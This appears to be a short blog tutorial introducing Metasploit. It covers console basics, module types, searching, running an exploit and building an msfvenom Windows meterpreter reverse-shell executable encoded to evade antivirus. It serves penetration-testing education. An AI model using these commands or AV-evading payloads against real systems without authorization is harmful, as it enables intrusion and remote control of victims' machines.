Pentesting with Metasploit the Vulnerability Exploitation Tool (with Cheat Sheets)
Metasploit is the ultimate penetration testing tool for offensive security. And it’s so easy to use that even you could claim to be a hacker just by running a few commands. Also, it is incredibly powerful as well. This guide is a general overview of how Metasploit can be used.
1. Getting started
Start the Metasploit console.
# Start the console
The console will now show the msf shell. You can provide commands on the shell to run various Metasploit modules.
Metasploit continuously adds new modules to its collection. To make sure you always have the latest exploits, run:
msf > msfupdate # Update the msf database
Metasploit is quite big and it’s easy to get lost around. If you need help, run:
msf > help # Show help
The console output of the help command might feel overwhelming as well. But don’t worry. You’ll always have this blog post to help you out.
2. Metasploit Modules
Metasploit has thousands of modules. They are arranged in the following categories:
- Exploits: It is the most commonly used module. It sends payloads to targets and executes them.
- Payloads: It consists of code that runs remotely to exploit the target.
- Encoders: It encodes a payload so that it is not detected by firewalls/anti-malware programs.
- Nops: It keeps payload sizes consistent when encoders encode a payload. (Learn more about nop sled).
- Post: It contains modules that assist post-exploitation.
- Auxillary: It includes port scanners, fuzzers, sniffers, and other helper modules.
You can see the modules under each of these categories. Check what exists by running:
$ show exploits
$ show payloads
3. Searching for Modules
If you’ve tried
show exploits you’ve probably seen a huge list of modules. It’s impossible to go through this list and find what you need. You can use the search functionality to filter/look for your desired modules. Run:
$ search ftp
This will show you modules that have exploits for FTP servers. You can filter based on more criteria:
$ search ftp platform:windows rank:excellent
This will show excellently ranked FTP server exploits for windows machines. You can filter based on the following fields:
4. Run an Exploit
The following series of shell commands are typically used to run an exploit using Metasploit.
At first select the module of your choice that you want to run for exploitation.
msf > use exploit/[ExploitModule]
Modules have multiple options that need to be set for execution. To see what options can be set, see the options:
msf > show options
After seeing the options, set their values like:
msf > set [Option] [Value]
msf > RHOST 10.100.101.12 # example
msf > set RPORT 8000 # example
Now start the exploit:
msf > exploit
5. Make Payloads with Msfvenom
Sometimes you’ll need to create standalone files as payloads to send them to your target. Msfvenom is a CLI tool that can help with creating these files.
At first search for payloads and encoders that msfvenom has. Payloads execute an attack and encoders encode a payload so that the payload can evade AVs.
$ msfvenom -l # Payloads
$ msfvenom -l encoders # Encoders
A typical msfvenom that generates payloads looks like this.
$ msfvenom -p windows/meterpreter/reverse_tcp
-e x86/shikata_ga_nai -i 5
LPORT=4444 > met.exe
Other output formats such as pl, rb, py can also be specified.